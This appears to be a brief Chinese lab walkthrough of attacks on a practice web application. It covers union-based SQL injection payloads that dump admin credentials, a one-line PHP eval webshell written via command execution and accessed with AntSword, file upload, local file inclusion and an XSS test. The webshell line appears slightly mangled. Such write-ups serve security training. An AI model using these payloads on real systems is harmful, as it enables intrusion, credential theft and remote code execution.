一.SQL注入漏洞
1.输入id=1 --+ 下方出现数据说明闭合成功
2.测试得出数据库有三列
3.三处都是回显点
4.联合查询爆出库名
5.查表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='test'--+
6.查字段名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='test' and table_name='admin'--+
7. 查出用户名和密码
?id=-1 union select 1,group_concat(user_name,'~',user_pass),3 from admin--+
二.文件上传漏洞
1.用我们刚才获取的用户名和密码登录后发现可以上传文件
2.上传一句话木马进去
3.将文件地址拼接到网址后进行访问
4.使用蚁剑连接
三.命令执行漏洞
1.网址下方的输入框提示我们可以执行命令
2.尝试输入ls有效
3.借助这个漏洞我们写一句话木马到888.php 并访问
echo '<?php @eval($_POSTcmd);?>' > 888.php
4.复制地址用蚁剑连接
四.文件包含漏洞
1.修改刚才传入的888.php内容为phpinfo();重新上传访问后发现远程文件包含是关闭的,只能使用本地文件包含
2.访问php文件复制地址蚁剑连连接即可
五.XSS漏洞
在登录框中测试有没有XSS漏洞,成功弹窗
